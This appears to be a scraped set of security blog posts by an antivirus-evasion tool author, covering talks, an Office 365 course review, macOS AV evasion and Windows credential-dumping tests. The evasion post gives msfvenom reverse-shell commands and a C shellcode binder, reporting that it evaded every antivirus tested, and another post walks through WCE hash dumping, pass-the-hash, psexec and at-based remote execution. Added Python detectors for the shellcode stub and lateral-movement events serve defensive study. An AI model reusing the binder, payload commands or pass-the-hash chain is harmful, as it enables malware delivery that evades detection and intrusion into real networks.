This time I prepared some slides, download here:
BHUSA19_Arsenal_AVET
Author Archives: Daniel
Slides – Introduction to AVET
Florian and I were at the root.cologne meet-up to give an introduction to AVET:
Slides: avet introduction – root cologne
Interesting talks afterwards, nice location and pizza!
Now looking forward to Black Hat :).
Wifi Hotspot with Windows 7
More a short note to myself… but it might also be interesting for other folks.
You can make a Wifi hotspot with Windows 7 with some cmd foo, but also with the program Virtual Router Manager, which is easier:
Download:
https://softfamous.com/virtual-router-manager/
https://www.pcwelt.de/downloads/Virtual-Router-Manager-583195.html
Or search on Google…
Windows 7 IE Developer SSH Server
Recently I played with one of the Windows 7 32-bit IE Developer VMs (IE11.Win7.VirtualBox.zip) from here. I remember two exploitation classes where these machines were used.
I found an SSH server installed within the machine; it is not hidden or anything, but on the other hand nobody I asked was aware of it.
As you can see the server is running on port 22:
The SSH server itself is running with its own user:
The SSH service is not blocked by local firewall rules:
Short reminder: the password is “Passw0rd!”. So better use these machines in NAT mode, change the password, adjust the firewall, etc.
Happy Hacking.
A new project: welearnsecurity.com
Antivirus Evasion on OSX
A few months ago I did some research on antivirus (evasion) on OSX and now I decided to write a blog post about it.
Scope
* build executables that are not recognized by antivirus on Mac OSX
* for building Mac OSX executables you need Mac OSX
* shellcode/payload with MSF
* developed with C & some assembly
* main focus is learning and automation
Why?
Some high-profile targets use OSX… so AV might be a thing.
Dmitry Medvedev:
http://obamapacman.com/2009/08/russia-president-dmitry-medvedev-mac-user-kremlin/
As do some security researchers 😉
Charlie Miller:
Targeted Malware
… or like APT 28:
Test Cases and PoCs
* eicar
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o osx64_reverse_xor.out
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -f macho -o osx64_reverse.out
* msfvenom -p osx/x86/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 --platform OSX -f macho -o osx86_reverse.out
* gcc -o osx64_sc_binder.out osx64_sc_binder.c
osx64_sc_binder.c
#include <string.h>
#include <sys/mman.h>

/* msfvenom shellcode; shortened here exactly as in the original listing */
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xf2\xff\xff\xff\x48\x8d\x05\xef\xff"
...
"\x15";

int main(int argc, char **argv)
{
    /* one anonymous page mapped read/write/execute; the shellcode must fit into it */
    void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED)
        return 1;
    /* copy the buffer into the executable page and jump to it */
    memcpy(ptr, buf, sizeof buf);
    void (*fp)() = (void (*)())ptr;
    fp();
    return 0;
}
And then some testing….
Comodo
… found nothing, only eicar.
Sophos
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c
Avast
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c
Avira
Not recognized:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o a.out
… no further testing.
Finally
As can be seen, not much effort is needed to evade AV software on Mac OSX. The shellcode binder was enough to evade all tested products.
The binder: https://github.com/govolution/avepoc/blob/master/osx64_sc_binder.c
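The binder keeps the msfvenom bytes unchanged in its data section, so the interesting defender's question is why a plain byte signature over the file did not fire. As an added example, not code from the post or from the avepoc/AVET projects, here is a small Python scanner for the decoder prologue that buf[] above starts with. The exact signature is the 15 bytes printed in the listing; the masked variant additionally wildcards the 32-bit immediate of the sub rcx instruction, on the assumption that this immediate is the decoder's block count and therefore changes with payload length. The sample buffer is constructed and is not a real Mach-O file.

```python
"""Byte-signature scan for the msfvenom x64/xor decoder prologue.

Added example, not taken from the post or the avepoc/AVET projects.
The exact bytes come from the start of buf[] in osx64_sc_binder.c;
which bytes vary per payload is an assumption stated below.
"""
from typing import List, Optional

# First 15 bytes of buf[] as printed in the post:
#   48 31 c9               xor rcx, rcx
#   48 81 e9 f2 ff ff ff   sub rcx, -14      (loop counter, see assumption)
#   48 8d 05 ef ff         lea rax, [rip-..] (displacement cut off in the listing)
XOR_STUB_EXACT = bytes.fromhex("4831c94881e9f2ffffff488d05efff")

# Same prologue with the sub-immediate wildcarded (None = any byte).
# Assumption: that immediate is the number of 8-byte blocks to decode,
# so it differs between payloads while the opcodes stay the same.
XOR_STUB_MASKED: List[Optional[int]] = [
    0x48, 0x31, 0xC9,
    0x48, 0x81, 0xE9, None, None, None, None,
    0x48, 0x8D, 0x05,
]


def find_exact(data: bytes, sig: bytes = XOR_STUB_EXACT) -> List[int]:
    """Return every offset at which the exact signature occurs."""
    offsets, start = [], 0
    while (i := data.find(sig, start)) != -1:
        offsets.append(i)
        start = i + 1
    return offsets


def find_masked(data: bytes, pattern=XOR_STUB_MASKED) -> List[int]:
    """Return every offset at which the wildcard pattern matches."""
    n = len(pattern)
    return [
        i for i in range(len(data) - n + 1)
        if all(p is None or data[i + k] == p for k, p in enumerate(pattern))
    ]


def scan_file(path: str) -> dict:
    """Scan a file on disk and report both kinds of hits."""
    with open(path, "rb") as fh:
        data = fh.read()
    return {"exact": find_exact(data), "masked": find_masked(data)}


# Constructed sample: padding, the stub as printed, padding, then a second
# copy with a different loop counter (0x20 blocks) that only the masked
# pattern should catch. Not a real Mach-O file.
SAMPLE = (
    b"\x00" * 64
    + XOR_STUB_EXACT
    + b"\xff" * 32
    + bytes.fromhex("4831c94881e920000000488d05efff")
    + b"\x00" * 16
)

if __name__ == "__main__":
    print("exact :", find_exact(SAMPLE))
    print("masked:", find_masked(SAMPLE))
```

Whether any of the products tested above actually carries such a signature is not something this script can tell; it only shows that the bytes are there to be found, and that a signature on the opcodes alone survives a change of payload size where the exact one does not.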
Nevertheless, I made a small PoC version of AVET (based on the old version 1.3) for OSX (https://github.com/govolution/avetosx).
Maybe I will try to integrate it in AVET 2 some time.
Review EDX Course Security in Office 365 (Microsoft CLD245x)
- Threats and data breaches targeting your data
- Office 365 Advanced Threat Protection
- Office 365 Threat Intelligence
- Auditing, alerting and reporting in Office 365
- Advanced Security Management in Office 365
- how threat actors gain access
- kill chain
- how the work and threat landscape changed
- on-premises environment vs. “gray area” (cloud etc.) in terms of control and security
- phishing
- malware
- spoofing
- escalation of privilege
- data exfiltration
- data deletion including ransomware
- data spillage (“Data spillage occurs when protected data is transferred to a system that doesn’t provide the same level of protection as the source.”)
- as well as password cracking
- malicious insiders
- Exchange Online Protection (EOP)
- Office 365 Advanced Threat Protection (Office 365 ATP)
- Office 365 Threat Intelligence
- Auditing and alerts
- Advanced Security Management (ASM)
- EOP (not End Of Protection 😉 but Exchange Online Protection)
- Office 365 Threat Intelligence
- Threat Dashboard
- Auditing and alerts
- Advanced Security Management (ASM)
- Threat detection
- Enhanced control
- Discovery and insights
- Overview of Office 365 Secure Score
- security related measurements
- Office 365 Secure Score API
- API & PowerShell
- downstream data for other tools and SIEM etc.
- The Secure Score dashboard
- The Secure Score analyzer tab
- Increasing your security posture
- I liked some of the points:
  - Enabling multi-factor authentication on all admin accounts
  - Designating more than one global admin
  - Enabling auditing across workloads
  - Enabling mailbox auditing
  - Having a weekly review of sign-ins after multiple failures
  - Having a weekly review of sign-ins from unknown sources
  - Having a weekly review of sign-ins from multiple geographies
- The anti-malware pipeline in Office 365
- Zero-hour auto purge
- ZAP, detect spam or malware that was undetected by heuristics and delivery patterns
- Phishing and spoofing protection
- SPF, DKIM, DMARC
- Spoof Intelligence
- Give overview of spoofing attempts, allow spoofing for certain senders for certain addresses
- Managing spoof intelligence
- How ATP expands protection provided by EOP
- Safe attachments
- sandbox/detonation chamber 😀
- Safe attachment policy options
- Safe links
- URL detonation -> mix of safe links and safe attachments
- Safe links policy options
- Creating safe attachment policies in the Security and Compliance Center
- Creating safe attachments policies using Windows PowerShell
- Modifying an existing safe attachments policy in the Security and Compliance Center
- Creating a transport rule to bypass safe attachments
- Safe attachments end user experience
- Creating safe links policies by using the Security and Compliance Center
- Creating safe links policies using Windows PowerShell
- Modifying an existing safe links policy
- Create a transport rule to bypass safe links
- Safe links user experience in email
- Safe links user experience in Office 2016
- Threat protection status report
- ATP message disposition report
- ATP file types report
- Malware detections report
- Top Malware report
- Top Senders and Recipients report
- Spoof Mail report
- Spam Detections report
- Sent and received email report
- Security & Compliance Report Demonstration
- Microsoft Intelligent Security Graph
- Source: Windows, Office 365, Cloud Services, 3rd party
- Threat dashboard
- reporting tool for C-level
- Threat explorer
- analysts, admins
- Threat detections in your tenant
- Security and malware trends
- Alerts
- More insights
- Threat Intelligence Demonstration
- Viewing options in Threat explorer
- Filtering capabilities in Threat Explorer
- Drilling for details
- Incident reports
- Auditing architecture in Office 365
- Audited activities
- Office 365 Management Activity API
- Mailbox actions logged by mailbox audit logging
- Enabling mailbox auditing
- Specifying owner actions to audit
- Changing the age limit for entries in the mailbox audit log
- Enabling auditing in your tenant
- Granting permissions
- Searching the audit log
- Viewing the search results
- Filtering the search results
- Exporting the search results to a file
- Searching the audit log by using Windows PowerShell
- Using a SIEM application to access your auditing data
- The SharePoint sharing schema
- The SharePoint Sharing model and sharing events
- How to identify resources shared with external users
- Introduction to insights and alerts
- Types of insights that are available
- Types of alerts that are generated
- Alerts features in the Security & Compliance Center
- Alert policy settings
- Default alert policies
- Viewing alerts
- Managing alerts
- Lesson introduction
- Anomaly detection policies
- Login authentication failures
- Administrator activity
- Inactive accounts
- Location
- Impossible travel
- Device and user agent
- Activity policies
- Anomaly detection and activity alerts
- Policy templates
- Productivity app discovery
- App permissions
- Enabling and accessing Advanced Security Management
- Creating anomaly detection policies
- Creating activity policies
- Reviewing and taking action on alerts
- Investigating activities in the Activity log
- Grouping IP addresses to simplify management
- Log file requirements
- Supported vendors and their data attributes
- Creating app discovery reports
- Reviewing app discovery findings
- Troubleshooting errors when log files are uploaded
- App permissions architecture
- Managing app permissions
- Approving or banning an app
From my side, more insight into the security mechanisms and more detail on Threat Intelligence would have been great. The course goes into logging and how to find strange behaviour, malware and threat intelligence, and it was really nice to see how much effort Microsoft puts into securing their cloud products.
A lot of the questions in the module assessments are more about configuring the platform itself or how tabs are named; I felt a bit like in an MS exam a long time ago. Large parts of the content are text and not videos, where most courses are a bit different.
Testing some hashdump and lateral movement techniques
Some time ago I tested some techniques; now published quick & dirty as a note for whoever might find it interesting.
Test WCE
Source: http://www.ampliasecurity.com
E:\wce_v1_42beta_x32>wce
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
dax:DAX-RYMZ48Z3EYO:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
DAX-RYMZ48Z3EYO$:ACME:00000000000000000000000000000000:4460E0BCB8CCF37D8A9E81XXXXXXXXXX
E:\wce_v1_42beta_x32>wce -s Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Changing NTLM credentials of current logon session (00168AB3h) to:
Username: Administrator
domain: ACME
LMHash: E52CAC67419A9A224A3B10XXXXXXXXXX
NTHash: 8846F7EAEE8FB118AB06BDXXXXXXXXXX
NTLM credentials successfully changed!
E:\wce_v1_42beta_x32>dir \\192.168.16.2\c$
Volume in Laufwerk \\192.168.16.2\c$: hat keine Bezeichnung.
Volumeseriennummer: 5450-733C
Verzeichnis von \\192.168.16.2\c$
21.05.2016 14:44 0 AUTOEXEC.BAT
21.05.2016 15:56
ClientApps
21.05.2016 14:44 0 CONFIG.SYS
21.05.2016 15:00Dokumente und Einstellungen
21.05.2016 17:33 2.229.504 Exchange Server Setup Progress.log
21.05.2016 15:24fax
21.05.2016 15:51Inetpub
21.05.2016 15:52Programme
21.05.2016 15:51Users Shared Folders
21.05.2016 17:33WINDOWS
21.05.2016 14:50wmpub
3 Datei(en) 2.229.504 Bytes
8 Verzeichnis(se), 16.708.521.984 Bytes frei
But for remote execution psexec is needed:
E:\wce_v1_42beta_x32>..\PSTools\psexec \\192.168.16.2 ipconfig
PsExec v2.11 - Execute processes remotely
Copyright (C) 2001-2014 Mark Russinovich
Sysinternals - http://www.sysinternals.com
Windows-IP-Konfiguration
Ethernet-Adapter LAN-Verbindung des Servers:
Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :
ipconfig exited on 192.168.16.2 with error code 0.
E:\wce_v1_42beta_x32>copy wce.exe \\192.168.16.2\c$
1 Datei(en) kopiert.
-> worked
E:\wce_v1_42beta_x32>del wce.exe \\192.168.16.2\c$
Möchten Sie "\\192.168.16.2\c$\*" löschen (J/N)? J
E:\wce_v1_42beta_x32>md \\192.168.16.2\c$\temp
Running commands with at
E:\wce_v1_42beta_x32>at \\192.168.16.2 18:35 cmd /c "ipconfig > c:\temp\ipconf.txt"
Neuer Auftrag hinzugefügt. Kennung = 1
E:\wce_v1_42beta_x32>move \\192.168.16.2\c$\temp\ipconf.txt .
E:\wce_v1_42beta_x32>type ipconf.txt
Windows-IP-Konfiguration
Ethernet-Adapter LAN-Verbindung des Servers:
Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :
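The chain tested above (NTLM logon with injected hashes, admin share access, a PsExec service, an at job) leaves a recognisable trail on the target. As an added example that is not part of the original post, here is a small Python correlation over constructed Windows events in a JSON-lines shape similar to what a log forwarder delivers. The event IDs used (4624, 5140, 7045, 4698) are the Vista-and-later ones, not those of the 2003-era target in the test; the field names and the source address 192.168.16.50 are assumptions and made up. An NTLM network logon by itself is ordinary, and the log does not reveal whether a hash or a password was supplied, so the rule only fires when follow-on actions from the same source or account arrive within a time window.

```python
"""Correlate NTLM network logons with follow-on admin-share, PsExec and
at-job activity on one host.

Added example, not part of the original post. Events are CONSTRUCTED,
in a JSON-lines shape similar to what a log forwarder emits, and use the
Vista+ event IDs 4624, 5140, 7045 and 4698 (assumption: the reader's
pipeline exposes these fields under these names).
"""
import json
from datetime import datetime, timedelta
from typing import Dict, List

WINDOW = timedelta(minutes=10)  # how long after the logon follow-ups count

# Constructed sample: one remote NTLM logon as ACME\Administrator from a
# made-up source, then C$ access, PSEXESVC install and an at job within
# minutes; plus one ordinary interactive logon that must not fire.
SAMPLE_EVENTS = r"""
{"time": "2016-05-21T18:30:01", "id": 4624, "LogonType": 3, "AuthPackage": "NTLM", "LogonProcess": "NtLmSsp", "Domain": "ACME", "User": "Administrator", "SourceIP": "192.168.16.50"}
{"time": "2016-05-21T18:30:02", "id": 5140, "ShareName": "\\\\*\\C$", "User": "Administrator", "SourceIP": "192.168.16.50"}
{"time": "2016-05-21T18:31:10", "id": 7045, "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"}
{"time": "2016-05-21T18:34:30", "id": 4698, "TaskName": "\\At1", "User": "Administrator"}
{"time": "2016-05-21T09:05:00", "id": 4624, "LogonType": 2, "AuthPackage": "Negotiate", "LogonProcess": "User32", "Domain": "ACME", "User": "dax", "SourceIP": "127.0.0.1"}
"""


def parse_events(text: str) -> List[Dict]:
    """Parse JSON lines into dicts with a real datetime, oldest first."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["time"] = datetime.fromisoformat(ev["time"])
        events.append(ev)
    return sorted(events, key=lambda e: e["time"])


def is_remote_ntlm_logon(ev: Dict) -> bool:
    # Logon type 3 over NTLM via NtLmSsp: how a share or psexec connection
    # made with injected NTLM credentials looks on the target
    return (ev["id"] == 4624 and ev.get("LogonType") == 3
            and ev.get("AuthPackage") == "NTLM"
            and ev.get("LogonProcess") == "NtLmSsp")


def is_admin_share_access(ev: Dict) -> bool:
    # 5140 on C$, ADMIN$ etc.: the "dir \\host\c$" and "copy" steps
    return ev["id"] == 5140 and ev.get("ShareName", "").endswith("$")


def is_psexec_service(ev: Dict) -> bool:
    # 7045 in the System log: PsExec installs its helper service
    return ev["id"] == 7045 and ev.get("ServiceName", "").upper() == "PSEXESVC"


def is_task_created(ev: Dict) -> bool:
    # 4698: the "at \\host ..." step
    return ev["id"] == 4698


def find_lateral_movement(events: List[Dict]) -> List[Dict]:
    """Return one finding per NTLM network logon that is followed by
    admin-share, PsExec-service or task-creation activity within WINDOW."""
    findings = []
    for logon in events:
        if not is_remote_ntlm_logon(logon):
            continue
        src, user = logon["SourceIP"], logon["User"]
        later = [e for e in events if e is not logon
                 and logon["time"] <= e["time"] <= logon["time"] + WINDOW]
        hits = []
        if any(is_admin_share_access(e) and e.get("SourceIP") == src for e in later):
            hits.append("admin_share")
        if any(is_psexec_service(e) for e in later):
            hits.append("psexec_service")
        if any(is_task_created(e) and e.get("User") == user for e in later):
            hits.append("scheduled_task")
        if hits:
            findings.append({
                "source": src,
                "account": f"{logon.get('Domain', '')}\\{user}",
                "logon_time": logon["time"].isoformat(),
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in find_lateral_movement(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

On a real estate the noisy part is the first rule: administrators and backup jobs also produce type-3 NTLM logons, which is why the finding is built from the follow-on events and not from the logon alone. Event 7045 carries no source address, so it is tied to the logon only by time; narrowing WINDOW trades missed slow chains for fewer coincidences.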
Test pwdump
Source (seems to be down):
http://52.25.198.231/blog/2015/09/02/reading-windows-password/
https://github.com/khuangia/wce
Fork:
https://github.com/govolution/wce
32-bit only, as far as I remember.
C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl getpwd.cpp /link psapi.lib advapi32.lib
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
getpwd.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.
/out:getpwd.exe
psapi.lib
advapi32.lib
getpwd.obj
C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl /LD getpwd_dll.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
getpwd_dll.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.
/out:getpwd_dll.dll
/dll
/implib:getpwd_dll.lib
getpwd_dll.obj
Creating library getpwd_dll.lib and object getpwd_dll.exp
-> then use it ;).
Recommended Talks for the New Year (mainly 35C3)
Like last year, here are some recommendations for starting into 2019. Mainly from 35C3 and one from BlueHat.
See the original thread on Twitter here (it’s a bit messed up, but should be complete):
Avet setup.sh script
Now there is a setup.sh script for easier installation of AVET (thanks to https://github.com/tacticaljmp). Tested with Kali Linux 2018.3a.
I made two short videos:
After starting the script you may have to wait for a couple of minutes. Then click through the installation routine for the compiler:
… and you are done.
Download AVET: https://github.com/govolution/avet